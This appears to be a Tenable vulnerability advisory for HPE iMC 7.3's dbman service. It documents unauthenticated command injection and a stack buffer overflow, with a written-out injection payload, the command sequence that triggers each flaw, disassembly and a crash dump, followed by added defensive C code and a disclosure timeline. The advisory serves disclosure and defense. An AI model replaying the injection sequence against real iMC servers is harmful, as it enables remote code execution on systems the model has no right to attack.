
HPE iMC 7.3 E0605P06 Multiple Vulnerabilities

Critical

Synopsis

Unauthenticated Remote Command Injection in dbman 
The dbman process (a component of iMC) defines command 10018 (hostRoleSwitch), which sets the configuration variables PrimaryHost, BackupTime?, and BackHoseIp in dbman.conf. An unauthenticated attacker can use this command to inject additional dbman.conf variables by appending them to the BackHoseIp value in the command request. For example, specifying BackHoseIp as '127.0.0.1\nPrimaryDbSaUserName1 = foo" -F & notepad.exe & "' injects a malformed database user name. If a variable appears more than once in dbman.conf, the first instance is used. Because BackHoseIp appears early in dbman.conf (it is the third variable, after Language and EnableDbman), the injected variables override every existing variable except Language and EnableDbman.

The attacker then issues command 10000 (SendBakConfigFileReq) to reload dbman.conf with the injected configuration variables, and finally command 10002 (ManualBackupDBase). As part of the backup process, dbman accesses the database using the DB credentials configured in dbman.conf. Because the attacker injected a command (notepad.exe) into PrimaryDbSaUserName1, dbman runs 'cmd.exe /c osql -b -S,1433 -dmaster -U"foo" -F & notepad.exe & "" -P"" -n -o"C:\Program Files\iMC\dbman\bin\dbop.sql.log" -i"C:\Program Files\iMC\dbman\bin\dbop.sql"', and notepad.exe is executed. The above scenario applies when iMC is installed on Windows with SQLSERVER as the backend database server. It is reasonable to assume the exploit would still work (with some adjustments to the injected configuration variables) for other iMC deployments, since dbman invokes system() from its runCommand() function.

Unauthenticated Remote Stack Buffer Overflow in dbman 
An unauthenticated, remote attacker issues command 10018 (hostRoleSwitch) with a long BackHoseIp field, which is written to dbman.conf as the BackHoseIp configuration variable. Each configuration line (variable name and value) is limited to 0x400 bytes, including the terminating NUL character:

[...snip...]
.text:00444726 push 400h
.text:0044472B lea ecx, [ebp+var_sb400_line]
.text:00444731 push ecx
.text:00444732 lea ecx, [ebp+var_fstream]
.text:00444738 call ds:?getline@?$basic_istream@DU?$char_traits@D@std@@@std@@QAEAAV12@PADH@Z ; std::basic_istream<char,std::char_traits<char>>::getline(char *,int)
.text:0044473E mov [ebp+var_55C], eax
.text:00444744 mov edx, [ebp+var_55C]
.text:0044474A mov eax, [edx]
.text:0044474C mov ecx, [ebp+var_55C]
.text:00444752 add ecx, [eax+4]
.text:00444755 call ds:??Bios_base@std@@QBEPAXXZ ; std::ios_base::operator void *(void)
.text:0044475B test eax, eax
.text:0044475D jz no_more_lines
[...snip...]

The attacker then issues command 10000 (SendBakConfigFileReq) to reload dbman.conf with the long BackHoseIp variable. While dbman.conf is reloaded, the long BackHoseIp value (0x3f2 bytes in this case) is copied with strcpy into a fixed-size stack buffer of 0x12c bytes:

[...snip...]
.text:00444DA7 mov edx, [ebp+var_psCfgItemValue]
.text:00444DAA push edx ; Source
.text:00444DAB mov eax, [ebp+arg_pOutbuf] ; stack-buf of 0x12c bytes
.text:00444DAE push eax ; Dest
.text:00444DAF call strcpy
[...snip...]

This can cause a stack buffer overflow:

0:008> g

STATUS_STACK_BUFFER_OVERRUN encountered
(3e24.3c34): Break instruction exception - code 80000003 (first chance)
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\iMC\dbman\bin\dbman.exe - 
eax=00000000 ebx=00000000 ecx=0165efcc edx=0165ee91 esi=00000000 edi=004ca160
eip=7431a4cf esp=0165eff8 ebp=0165f084 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202
KERNELBASE!UnhandledExceptionFilter+0x3d0af:
7431a4cf cc int 3
0:001> kb
 # ChildEBP RetAddr Args to Child 
00 0165f084 004a87b3 004ca160 0ebde030 f1421fcf KERNELBASE!UnhandledExceptionFilter+0x3d0af
WARNING: Stack unwind information not available. Following frames may be wrong.
01 0165f3b8 0044dedb 0165f64c 0165f64c 0165f668 dbman!std::_Init_locks::operator=+0xccb
02 0165fd38 41414141 41414141 41414141 41414141 dbman+0x4dedb
03 0165fd3c 41414141 41414141 41414141 41414141 0x41414141
04 0165fd40 41414141 41414141 41414141 41414141 0x41414141
05 0165fd44 41414141 41414141 41414141 41414141 0x41414141
06 0165fd48 41414141 41414141 41414141 41414141 0x41414141
07 0165fd4c 41414141 41414141 41414141 41414141 0x41414141
08 0165fd50 41414141 41414141 41414141 41414141 0x41414141
09 0165fd54 41414141 41414141 41414141 41414141 0x41414141
0a 0165fd58 41414141 41414141 41414141 41414141 0x41414141
0b 0165fd5c 41414141 41414141 41414141 41414141 0x41414141
0c 0165fd60 41414141 41414141 41414141 41414141 0x41414141
0d 0165fd64 41414141 41414141 41414141 41414141 0x41414141
0e 0165fd68 41414141 41414141 41414141 41414141 0x41414141
0f 0165fd6c 41414141 41414141 41414141 41414141 0x41414141
10 0165fd70 41414141 41414141 41414141 41414141 0x41414141
11 0165fd74 41414141 41414141 41414141 41414141 0x41414141
12 0165fd78 41414141 41414141 41414141 41414141 0x41414141
13 0165fd7c 41414141 41414141 41414141 41414141 0x41414141
14 0165fd80 41414141 41414141 41414141 41414141 0x41414141
15 0165fd84 41414141 41414141 41414141 41414141 0x41414141
16 0165fd88 41414141 41414141 41414141 41414141 0x41414141
17 0165fd8c 41414141 41414141 41414141 41414141 0x41414141
18 0165fd90 41414141 41414141 41414141 41414141 0x41414141
19 0165fd94 41414141 41414141 41414141 41414141 0x41414141
1a 0165fd98 41414141 41414141 41414141 41414141 0x41414141
1b 0165fd9c 41414141 41414141 41414141 41414141 0x41414141
1c 0165fda0 41414141 41414141 41414141 41414141 0x41414141
1d 0165fda4 41414141 41414141 41414141 41414141 0x41414141
1e 0165fda8 41414141 41414141 41414141 41414141 0x41414141
1f 0165fdac 41414141 41414141 41414141 41414141 0x41414141
20 0165fdb0 41414141 41414141 41414141 41414141 0x41414141
21 0165fdb4 41414141 41414141 41414141 41414141 0x41414141
22 0165fdb8 41414141 41414141 41414141 41414141 0x41414141
23 0165fdbc 41414141 41414141 41414141 41414141 0x41414141
24 0165fdc0 41414141 41414141 41414141 41414141 0x41414141
25 0165fdc4 41414141 41414141 41414141 41414141 0x41414141
26 0165fdc8 41414141 41414141 41414141 41414141 0x41414141
27 0165fdcc 41414141 41414141 41414141 41414141 0x41414141
28 0165fdd0 41414141 41414141 41414141 41414141 0x41414141
29 0165fdd4 41414141 41414141 41414141 41414141 0x41414141
2a 0165fdd8 41414141 41414141 41414141 41414141 0x41414141
2b 0165fddc 41414141 41414141 41414141 41414141 0x41414141
2c 0165fde0 41414141 41414141 41414141 41414141 0x41414141
2d 0165fde4 41414141 41414141 41414141 41414141 0x41414141
2e 0165fde8 41414141 41414141 41414141 41414141 0x41414141
2f 0165fdec 41414141 41414141 41414141 41414141 0x41414141
30 0165fdf0 41414141 41414141 41414141 41414141 0x41414141
31 0165fdf4 41414141 41414141 41414141 41414141 0x41414141
32 0165fdf8 41414141 41414141 41414141 41414141 0x41414141
33 0165fdfc 41414141 41414141 41414141 41414141 0x41414141
34 0165fe00 41414141 41414141 41414141 41414141 0x41414141
35 0165fe04 41414141 41414141 41414141 41414141 0x41414141
36 0165fe08 41414141 41414141 41414141 41414141 0x41414141
37 0165fe0c 41414141 41414141 41414141 41414141 0x41414141
38 0165fe10 41414141 41414141 41414141 41414141 0x41414141
39 0165fe14 41414141 41414141 41414141 41414141 0x41414141
3a 0165fe18 41414141 41414141 41414141 41414141 0x41414141
3b 0165fe1c 41414141 41414141 41414141 41414141 0x41414141
3c 0165fe20 41414141 41414141 41414141 41414141 0x41414141
3d 0165fe24 41414141 41414141 41414141 41414141 0x41414141
3e 0165fe28 41414141 41414141 41414141 41414141 0x41414141
3f 0165fe2c 41414141 41414141 41414141 41414141 0x41414141
40 0165fe30 41414141 41414141 41414141 41414141 0x41414141
41 0165fe34 41414141 41414141 41414141 41414141 0x41414141
42 0165fe38 41414141 41414141 41414141 41414141 0x41414141
43 0165fe3c 41414141 41414141 41414141 41414141 0x41414141
44 0165fe40 41414141 41414141 41414141 41414141 0x41414141
45 0165fe44 41414141 41414141 41414141 41414141 0x41414141
46 0165fe48 41414141 41414141 41414141 41414141 0x41414141
47 0165fe4c 41414141 41414141 41414141 41414141 0x41414141
48 0165fe50 41414141 41414141 41414141 41414141 0x41414141
49 0165fe54 41414141 41414141 41414141 41414141 0x41414141
4a 0165fe58 41414141 41414141 41414141 41414141 0x41414141
4b 0165fe5c 41414141 41414141 41414141 41414141 0x41414141
4c 0165fe60 41414141 41414141 41414141 41414141 0x41414141
4d 0165fe64 41414141 41414141 41414141 41414141 0x41414141
4e 0165fe68 41414141 41414141 41414141 41414141 0x41414141
4f 0165fe6c 41414141 41414141 41414141 41414141 0x41414141
50 0165fe70 41414141 41414141 41414141 41414141 0x41414141
51 0165fe74 41414141 41414141 41414141 41414141 0x41414141
52 0165fe78 41414141 41414141 41414141 41414141 0x41414141
53 0165fe7c 41414141 41414141 41414141 41414141 0x41414141
54 0165fe80 41414141 41414141 41414141 41414141 0x41414141
55 0165fe84 41414141 41414141 41414141 41414141 0x41414141
56 0165fe88 41414141 41414141 41414141 41414141 0x41414141
57 0165fe8c 41414141 41414141 41414141 41414141 0x41414141
58 0165fe90 41414141 41414141 41414141 41414141 0x41414141
59 0165fe94 41414141 41414141 41414141 41414141 0x41414141
5a 0165fe98 41414141 41414141 41414141 41414141 0x41414141
5b 0165fe9c 41414141 41414141 41414141 41414141 0x41414141
5c 0165fea0 41414141 41414141 41414141 41414141 0x41414141
5d 0165fea4 41414141 41414141 41414141 41414141 0x41414141
5e 0165fea8 41414141 41414141 41414141 41414141 0x41414141
5f 0165feac 41414141 41414141 41414141 41414141 0x41414141
60 0165feb0 41414141 41414141 41414141 41414141 0x41414141
61 0165feb4 41414141 41414141 41414141 41414141 0x41414141
62 0165feb8 41414141 41414141 41414141 41414141 0x41414141
63 0165febc 41414141 41414141 41414141 41414141 0x41414141
64 0165fec0 41414141 41414141 41414141 41414141 0x41414141
65 0165fec4 41414141 41414141 41414141 41414141 0x41414141
66 0165fec8 41414141 41414141 41414141 41414141 0x41414141
67 0165fecc 41414141 41414141 41414141 41414141 0x41414141
68 0165fed0 41414141 41414141 41414141 41414141 0x41414141
69 0165fed4 41414141 41414141 41414141 41414141 0x41414141
6a 0165fed8 41414141 41414141 41414141 41414141 0x41414141
6b 0165fedc 41414141 41414141 41414141 41414141 0x41414141
6c 0165fee0 41414141 41414141 41414141 41414141 0x41414141
6d 0165fee4 41414141 41414141 41414141 41414141 0x41414141
6e 0165fee8 41414141 41414141 41414141 41414141 0x41414141
6f 0165feec 41414141 41414141 41414141 41414141 0x41414141
70 0165fef0 41414141 41414141 41414141 41414141 0x41414141
71 0165fef4 41414141 41414141 41414141 41414141 0x41414141
72 0165fef8 41414141 41414141 41414141 41414141 0x41414141
73 0165fefc 41414141 41414141 41414141 41414141 0x41414141
74 0165ff00 41414141 41414141 41414141 41414141 0x41414141
75 0165ff04 41414141 41414141 41414141 41414141 0x41414141
76 0165ff08 41414141 41414141 41414141 41414141 0x41414141
77 0165ff0c 41414141 41414141 41414141 41414141 0x41414141
78 0165ff10 41414141 41414141 41414141 41414141 0x41414141
79 0165ff14 41414141 41414141 41414141 41414141 0x41414141
7a 0165ff18 41414141 41414141 41414141 41414141 0x41414141
7b 0165ff1c 41414141 41414141 41414141 41414141 0x41414141
7c 0165ff20 41414141 41414141 41414141 41414141 0x41414141
7d 0165ff24 41414141 41414141 41414141 41414141 0x41414141
7e 0165ff28 41414141 41414141 41414141 41414141 0x41414141
7f 0165ff2c 41414141 41414141 41414141 41414141 0x41414141
80 0165ff30 41414141 41414141 41414141 41414141 0x41414141
81 0165ff34 41414141 41414141 41414141 41414141 0x41414141
82 0165ff38 41414141 41414141 41414141 41414141 0x41414141
83 0165ff3c 41414141 41414141 41414141 41414141 0x41414141
84 0165ff40 41414141 41414141 41414141 41414141 0x41414141
85 0165ff44 41414141 41414141 41414141 41414141 0x41414141
86 0165ff48 41414141 41414141 41414141 41414141 0x41414141
87 0165ff4c 41414141 41414141 41414141 41414141 0x41414141
88 0165ff50 41414141 41414141 41414141 41414141 0x41414141
89 0165ff54 41414141 41414141 41414141 41414141 0x41414141
8a 0165ff58 41414141 41414141 41414141 41414141 0x41414141
8b 0165ff5c 41414141 41414141 41414141 41414141 0x41414141
8c 0165ff60 41414141 41414141 41414141 41414141 0x41414141
8d 0165ff64 41414141 41414141 41414141 41414141 0x41414141
8e 0165ff68 41414141 41414141 41414141 41414141 0x41414141
8f 0165ff6c 41414141 41414141 41414141 41414141 0x41414141
90 0165ff70 41414141 41414141 41414141 41414141 0x41414141
91 0165ff74 41414141 41414141 41414141 41414141 0x41414141
92 0165ff78 41414141 41414141 41414141 41414141 0x41414141
93 0165ff7c 41414141 41414141 41414141 41414141 0x41414141
94 0165ff80 41414141 41414141 41414141 41414141 0x41414141
95 0165ff84 41414141 41414141 41414141 41414141 0x41414141
96 0165ff88 41414141 41414141 41414141 41414141 0x41414141
97 0165ff8c 41414141 41414141 41414141 41414141 0x41414141
98 0165ff90 41414141 41414141 41414141 41414141 0x41414141
99 0165ff94 41414141 41414141 41414141 41414141 0x41414141
9a 0165ff98 41414141 41414141 41414141 41414141 0x41414141
9b 0165ff9c 41414141 41414141 41414141 41414141 0x41414141
9c 0165ffa0 41414141 41414141 41414141 41414141 0x41414141
9d 0165ffa4 41414141 41414141 41414141 41414141 0x41414141
9e 0165ffa8 41414141 41414141 41414141 41414141 0x41414141
9f 0165ffac 41414141 41414141 41414141 41414141 0x41414141
a0 0165ffb0 41414141 41414141 41414141 41414141 0x41414141
a1 0165ffb4 41414141 41414141 41414141 41414141 0x41414141
a2 0165ffb8 41414141 41414141 41414141 41414141 0x41414141
a3 0165ffbc 41414141 41414141 41414141 41414141 0x41414141
a4 0165ffc0 41414141 41414141 41414141 41414141 0x41414141
a5 0165ffc4 41414141 41414141 41414141 41414141 0x41414141
a6 0165ffc8 41414141 41414141 41414141 41414141 0x41414141
a7 0165ffcc 41414141 41414141 41414141 41414141 0x41414141
a8 0165ffd0 41414141 41414141 41414141 41414141 0x41414141
a9 0165ffd4 41414141 41414141 41414141 ff004141 0x41414141
aa 0165ffd8 41414141 41414141 ff004141 776662d7 0x41414141
ab 0165ffdc 41414141 ff004141 776662d7 00000000 0x41414141
ac 0165ffe0 ff004141 776662d7 00000000 00000000 0x41414141
ad 0165ffe4 776662d7 00000000 00000000 69e4345e 0xff004141
ae 0165ffe8 00000000 00000000 69e4345e 00f6ef40 ntdll!FinalExceptionHandlerPad7

The !exploitable WinDbg extension classifies the crash as exploitable:

0:001> !exploitable

!exploitable 1.6.0.0
Exploitability Classification: EXPLOITABLE
Recommended Bug Title: Exploitable - Exception Handler Chain Corrupted starting at KERNELBASE!UnhandledExceptionFilter+0x000000000003d0af (Hash=0xdaf335ab.0x3924b8ee)

Corruption of the exception handler chain is considered exploitable
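The two defects above share a root cause in how dbman.conf values are written and read back: a value is stored without rejecting line breaks (so one value can smuggle in extra "Key = Value" lines, and the loader takes the first instance of each key), and a value read with a 0x400-byte line limit is then copied with strcpy into a 0x12c-byte stack buffer. The following added example, which is not code from the iMC dbman binary or from the Tenable advisory, models both behaviours in plain C beside the checks a fix needs: a writer-side rejection of CR/LF and oversize values, a bounded copy in place of strcpy, and a first-instance-wins lookup. Buffer sizes and the first-instance rule are taken from the advisory; the function names and the sample config text are constructed for this example.

```c
/* Added example (not code from iMC's dbman or from the Tenable advisory):
 * models the two dbman.conf handling defects described above and the
 * hardened checks a fix would need. Buffer sizes (0x400 line limit, 0x12c
 * value buffer) and the first-instance-wins lookup rule come from the
 * advisory; function names and the sample config text are constructed. */
#include <stdio.h>
#include <string.h>

#define CFG_LINE_MAX  0x400   /* getline() limit seen in the disassembly */
#define CFG_VALUE_MAX 0x12c   /* size of the stack buffer strcpy writes into */

/* Writer-side check for a value about to be stored in dbman.conf.
 * The file is one "Key = Value" pair per line, so a value containing CR or
 * LF starts a new line that the loader cannot distinguish from a real one
 * (the command-injection issue). A value that would not fit the loader's
 * buffer is also refused (the overflow issue). Returns 1 if acceptable. */
int cfg_value_is_safe(const char *value)
{
    if (value == NULL) return 0;
    if (strpbrk(value, "\r\n") != NULL) return 0;
    if (strlen(value) >= CFG_VALUE_MAX) return 0;
    return 1;
}

/* Loader-side copy. The vulnerable pattern in the advisory is
 *     strcpy(stack_buf_0x12c, value);
 * with no length check. This version refuses anything that does not fit. */
int cfg_copy_value(char out[CFG_VALUE_MAX], const char *value)
{
    size_t n = strlen(value);
    if (n >= CFG_VALUE_MAX) {
        out[0] = '\0';
        return -1;            /* fail closed instead of overflowing */
    }
    memcpy(out, value, n + 1);
    return 0;
}

/* Look a key up in config text the way the advisory says dbman does:
 * lines are read with a 0x400-byte limit and the FIRST matching key wins.
 * Returns 0 on success, -1 if the value is too long, 1 if not found. */
int cfg_lookup(const char *config_text, const char *key, char out[CFG_VALUE_MAX])
{
    char line[CFG_LINE_MAX];
    const char *p = config_text;

    while (*p != '\0') {
        size_t full = strcspn(p, "\n");              /* length of this line */
        size_t len = full < CFG_LINE_MAX ? full : CFG_LINE_MAX - 1;
        memcpy(line, p, len);
        line[len] = '\0';
        p += full;
        if (*p == '\n') p++;

        char *eq = strchr(line, '=');
        if (eq == NULL) continue;
        *eq = '\0';
        char *kend = eq;                              /* trim "Key " */
        while (kend > line && kend[-1] == ' ') *--kend = '\0';
        char *v = eq + 1;                             /* trim " Value" */
        while (*v == ' ') v++;
        if (strcmp(line, key) == 0)
            return cfg_copy_value(out, v);
    }
    return 1;
}

/* Builds a config whose BackHoseIp value is value_len 'A's (constructed
 * input) and reports what the hardened loader does with it. */
int cfg_long_value_result(size_t value_len)
{
    char cfg[CFG_LINE_MAX + 64];
    char out[CFG_VALUE_MAX];
    if (value_len >= CFG_LINE_MAX) return -2;         /* keep the sample in bounds */
    int n = snprintf(cfg, sizeof cfg, "Language = en\nEnableDbman = 1\nBackHoseIp = ");
    memset(cfg + n, 'A', value_len);
    cfg[n + value_len] = '\n';
    cfg[n + value_len + 1] = '\0';
    return cfg_lookup(cfg, "BackHoseIp", out);
}

int main(void)
{
    /* Constructed config text of the shape an injected BackHoseIp value would
     * produce: the injected PrimaryDbSaUserName1 line precedes the real one. */
    const char *cfg =
        "Language = en\nEnableDbman = 1\nBackHoseIp = 127.0.0.1\n"
        "PrimaryDbSaUserName1 = injected\nPrimaryDbSaUserName1 = sa\n";
    char out[CFG_VALUE_MAX];
    cfg_lookup(cfg, "PrimaryDbSaUserName1", out);
    printf("first instance wins: PrimaryDbSaUserName1 = %s\n", out);
    printf("value with LF accepted by writer check: %d\n",
           cfg_value_is_safe("127.0.0.1\nPrimaryDbSaUserName1 = x"));
    printf("0x3f2-byte value, hardened loader result: %d\n",
           cfg_long_value_result(0x3f2));
    return 0;
}
```

The lookup deliberately keeps the first-instance-wins behaviour, because that rule is what turns a single injected line into an override of every later credential variable; the defensive change belongs at the writer (reject CR/LF) and at the copy (bound it), not in the lookup order. A 0x3f2-byte value passes the 0x400 line limit but is refused by the bounded copy, which is exactly the case the unbounded strcpy mishandled.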

Solution

A solution is not yet available.

Disclosure Timeline

12/07/18 - Vulnerabilities discovered
12/14/18 - Vulnerabilities reported via email. Tenable reminds HPE that their public key has a subkey that expired in 2017 and is therefore unusable. 90-day deadline set to March 18, 2019.
12/14/18 - HPE acknowledges receipt. Promises Tenable a case number next week.
01/23/19 - Tenable asks for an update.
01/28/19 - Tenable reminds HPE that today is the 45th day.
03/19/19 - Tenable reminds HPE that the 90 days have passed.
03/19/19 - HPE indicates patches are in test.

All information within TRA advisories is provided “as is”, without warranty of any kind, including the implied warranties of merchantability and fitness for a particular purpose, and with no guarantee of completeness, accuracy, or timeliness. Individuals and organizations are responsible for assessing the impact of any actual or potential security vulnerability.

Tenable takes product security very seriously. If you believe you have found a vulnerability in one of our products, we ask that you please work with us to quickly resolve it in order to protect customers. Tenable believes in responding quickly to such reports, maintaining communication with researchers, and providing a solution in short order.

For more details on submitting vulnerability information, please see our Vulnerability Reporting Guidelines page.

If you have questions or corrections about this advisory, please email [email protected]
